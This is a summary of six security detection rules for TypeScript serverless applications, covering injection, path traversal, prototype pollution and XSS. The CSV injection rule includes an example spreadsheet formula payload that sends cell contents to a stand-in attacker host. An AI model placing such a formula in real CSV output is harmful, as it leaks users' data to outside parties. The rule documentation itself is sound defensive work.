# Serverless (TypeScript) Security Security vulnerabilities and detection rules for serverless framework. 6 rules across 6 CWE categories. - Total rules: 6 - CWE categories: 6 - Critical rules: 3 ## CWEs - **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - **CWE-78**: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - **CWE-79**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - **CWE-89**: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - **CWE-1236**: Improper Neutralization of Formula Elements in a CSV File - **CWE-1321**: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') ## Rules - **Command Injection via child_process** [CRITICAL]: Detects user input flowing to shell command execution functions. - **CSV Injection (Formula Injection)** [MEDIUM]: Detects untrusted data being placed into CSV output, which can enable formula injection when the CSV is opened in spreadsheet software like Excel or Google Sheets. CSV injection occurs when user-controlled data containing formula characters (=, +, -, @, \t, \r) is written to a CSV file without proper escaping. When opened in spreadsheet software, these formulas can execute arbitrary commands or exfiltrate data. Example attack payload: =HYPERLINK("http://evil.com/"&A1, "Click") This would create a clickable link that sends the contents of cell A1 to the attacker. - **Path Traversal in File Operations** [CRITICAL]: Detects untrusted user input used in file system operations without proper validation. This can allow attackers to read or write arbitrary files on the server. - **Prototype Pollution via Object Manipulation** [HIGH]: Detects user input flowing to object merge operations without filtering dangerous keys. - **SQL Injection via Database Queries** [CRITICAL]: Detects user input flowing into SQL queries without parameterization. - **Cross-Site Scripting (XSS) via Response** [HIGH]: Detects user input flowing into HTTP responses without proper encoding or sanitization.